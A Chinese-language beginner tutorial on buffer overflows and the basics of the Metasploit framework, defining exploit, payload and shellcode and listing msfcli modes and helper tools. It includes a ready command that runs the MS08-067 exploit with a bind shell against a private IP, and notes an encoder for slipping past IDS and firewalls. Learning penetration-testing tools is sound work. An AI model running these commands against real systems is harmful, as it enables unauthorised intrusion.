估计有的朋友对缓冲区溢出似懂非懂吧? 在这里举个简单的例子哈。
缓冲区溢出好比是正常情况下,把三升的水倒入这个只有一升的杯子的时候,可想而知,多出来的部分就会溢出杯子洒到桌子上甚至满地都是水,我们的计算机也是一样,当黑客向缓冲区填充数据,而这个数据的长度超过了缓冲区本身的容量后数据就会溢出储存空间,装不下的数据就会覆盖在合法的数据上,导致程序的出错乃至崩溃,这就是缓冲区溢出的原理,但是缓冲区仅仅溢出,这只是一个问题,到这里,它并没有破坏性,但如果说能够精确地导入事先准备好的水时,比如1.325升水那么溢出的也就是0.325升水,黑客用编写好的攻击代码,使操作系统或者应用程序等出现缓冲区溢出,由于是事先已经精确定义
所以也将会导致黑客们想要得到的结果,比如死机,重启,获取rootshell,下载木马等等.. 这个时候你的系统或者程序已经被黑客控制了。关于metasploit的介绍我就不多说了,下列地址可以详细查看
metasploit百度百科:http://baike.baidu.com/view/3066432.htm
名称解释:
exploit
测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的
有内存溢出,网站程序漏洞利用,配置错误exploit。
payload
我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一个反向连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只能在目标机器上执行有限命令的程序。
shellcode
是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行之后提供一个可
执行命令的shell。
module
MSF 的模块,由一系列代码组成。
listener
等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序。
下面的说下metasploit的基础吧….
1、MSF 提供多种用户界面:控制台模式(msfconsole),命令行模式(msfcli),图形模式(msfgui、armitage),(在老版本中还有web 界面模式,后来貌似由于安全因素被取消了?)其中console模式最常用,启动方式:
cd /opt/framework/msf3/
msfconsole
运行此命令后将进入msf 命令提示符:
msf>
2、获取命令的帮助信息:help
例子:
help connect
3、msfcli 和msfconsole 相比不提供交互方式,它直接从命令行输入所有参数并产生结果,
msfcli –h #获取帮助信息
msfcli <exploit_name> <option=value> [mode]
——————————————————————————
mode:H(help)帮助
S(summary)显示模块信息
O(options)显示模块的可用选项
A(advanced)显示高级选项
I(ids)显示IDS EVASION 选项
P(payload)显示此模块可用的payload
T(targets)显示可用targets
4
AC(action)显示可用actions
C(check)运行模块测试
E(execute)执行选定的模块
————————————————————————————–
例子:ms08_067_netapi 模块
msfcli windows/smb/ms08_067_netapi O #查看可用选项
msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.111 P #查看可用payload
msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.111 PAYLOAD=windows/shell/bind_tcp E
#执行(此处O、P 等参数也可以用小写)
4、Armitage :MSF 的一个图形接口
运行方式:
cd /opt/farmework/msf3/
armitage
5、MSF 其他组件:
MSFpayload 工具:
用于生成shellcode,可生成C,Ruby,JaveScript,VB 格式的shellcode。
帮助信息:
msfpayload –h
MSFencode 工具:
编码压缩shellcode,过IDS ,防火墙。
msfencode -h
msfencode –l 查看可用的编码器(encoders),效果最佳的是x86/shikata_ga_nai
91ri.org:小编现在见到越来越多关于介绍metasploit的文章,在各个群里也经常看到有人问关于metasploit的问题,但大家似乎对msf有特殊的感情?觉得它无所不能?我建议所有msf爱好者看看这篇文章《
传说中的metasploit渗透防御终极手册?》,主要看评论,神吐槽!大家想看metasploit的实战文章可以点击:《
metasploit》。
本文作者小淡由
网络安全攻防研究室(www.91ri.org)
信息安全小组收集整理,转载请注明出处!